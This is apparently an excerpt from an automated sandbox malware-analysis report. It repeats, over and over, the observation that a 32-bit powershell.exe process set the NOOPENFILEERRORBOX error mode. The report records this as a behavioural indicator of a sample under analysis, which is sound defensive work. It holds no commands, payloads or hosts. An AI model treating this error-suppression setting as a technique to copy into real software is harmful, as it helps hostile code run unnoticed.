                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
